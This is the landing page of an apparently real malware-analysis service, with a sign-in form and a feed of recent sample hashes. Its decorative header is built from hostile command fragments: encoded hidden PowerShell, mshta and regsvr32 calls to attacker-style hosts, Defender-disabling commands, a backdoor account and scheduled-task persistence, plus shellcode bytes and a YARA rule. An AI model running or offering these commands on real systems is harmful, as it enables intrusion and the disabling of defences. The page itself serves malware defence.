ZIP · DOCX · XLSX
OLE · CFB · Container
VBA Macro · P-Code
Base64 · XOR · Obfusc.
Shellcode · Loader
// MALICIOUS PAYLOAD
@echo off
cmd /c powershell -nop -w hidden
-enc JABzAD0ATgBlAHcALQBP...
certutil -decode drop.b64 out.exe
regsvr32 /s /n /u /i:http://c2.re
mshta http://evil.re/stage.hta
rule Malware_Dropper {
strings:
$mz = { 4D 5A ?? ?? }
$ps = "powershell" nocase
$b64 = /[A-Za-z0-9+\/]{40,}/
condition: all of them
}
50 4B 03 04 14 00 06 00
// ZIP magic — outer container
Set sh=CreateObject("WScript.Shell")
sh.Run "powershell -ep bypass",0,True
Set x=CreateObject("MSXML2.XMLHTTP")
x.Open "GET", strUrl, False
wscript //B //NoLogo drop.vbs
ShellExecuteA
WinExec
CreateProcessA
InternetOpenA
URLDownloadToFile
Function Deobf(s As String)
For i = 1 To Len(s)
r = r & Chr(Asc(Mid(s,i,1))
Xor &H41)
Next i : Deobf = r
End Function
Invoke-Expression $decoded
[Assembly]::Load($buf).EntryPoint
Add-MpPreference
-ExclusionPath
$env:APPDATA
Set-MpPreference
-DisableRealtime $true
...\CurrentVersion\Run
$b=[Convert]::FromBase64String(
"JABzAD0ATgBlAHcALQBPAGIA")
%COMSPEC:~0,1%%COMSPEC:~9,1%
Chr(112)&Chr(111)&Chr(119)
agBlAGMAdAAoACcAaAB0AHQA
cAB0ADoALwAvAGUAdgBpAGwA
cgBlAC4AcgBlAC8AcABhAHkA
XOR key: 0x41
ROT13 + base64
RC4 stream cipher
net user backdoor
P@ss1234! /add
schtasks /create
/sc minute /mo 5
\x48\x31\xC0\x48\xB8\x63\x61
\x6C\x63\x00\x50\xFF\xD0\x90
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
NtUnmapViewOfSection
GetProcAddress
LoadLibraryA
4D 5A 90 00 03 00 FF FF
0xfc,0x48,0x83,0xe4,0xf0,0xe8
0xcc,0x00,0x00,0x00,0x41,0x51
0x41,0x50,0x52,0x51,0x56,0x48
invoke-webrequest -uri $c2
-outfile $env:TEMP\svc32.exe
Start-Process -WindowStyle Hidden
AAAA%p%p%p%p%x.%x.%x
ZwQueryInformationProcess
// THREAT INTELLIGENCE PLATFORM
Unlock the future of
Extended Malware
Analysis.
Advanced static & structural analysis for cybersecurity experts.
200+
Formats
YARA
Rule Engine
AI
Powered
// Recent threats
fa8a033af2e630fa87b00d0f3c8060bf
AutoIt Compiled Script
an hour ago
4df114dc93ef57583ef4cda686653d89
VBScript file
3 hours ago
32621d8b0e417df985000b31837b53c2
VBScript file
3 hours ago
a7f834e1edc61076aae2766a3f06f14b
VBScript file
3 hours ago
6e0bf20d707423265156282d00b90739
VBScript file
3 hours ago
b5ae077240af0a7eeb3e3363f226b4f5
VBScript file
3 hours ago
d12560989753e285a8729eac54f48f86
PowerShell Script
3 hours ago
54dfd654156cc7436c5919ead36333f6
VBScript file
3 hours ago
17fdd8d11416fa5a5c981c27090cd018
PowerShell Script
3 hours ago
ef4eed6cbfb0611a80941887eebfabb1
PowerShell Script
3 hours ago
4d9a2b2e92a893961ab920a0ca23a760
VBScript file
3 hours ago
5f7eb3c1ac0f73aa2836f14ecd5c31cd
VBScript file
4 hours ago
897cb084996039a8732bcdf4f8043cda
Microsoft Excel document
4 hours ago
C2: https[:]//team.sp.ford.com/sites/GPCS[...]ker.xlsx
6fdc770a811b292e4a300beaf378b43e
VBScript file
4 hours ago
b03101e840749fea73d3119cdeed8d2f
Portable Executable file
5 hours ago
ce87dd218969569f0012d89e71d1c412
VBScript file
6 hours ago
55c49eb12a55b3dabf3d6c44ebb054fd
VBScript file
7 hours ago
e00946f9f950d0c2330f2a1fa47a35a9
VBScript file
yesterday
49ee8b65f98f7426cf78e1e48bc41e1c
VBScript file
yesterday
11b08540ef4f1c06e84ad12567a81bef
PowerShell Script
yesterday
Connect & explore more →
Sign in
New user?
Create an account →
Email address
Continue
or
Continue with Google
Continue with Microsoft
MALVA.RE · SECURE ACCESS · v2
An error has occurred. This application may no longer respond until reloaded.
Reload
🗙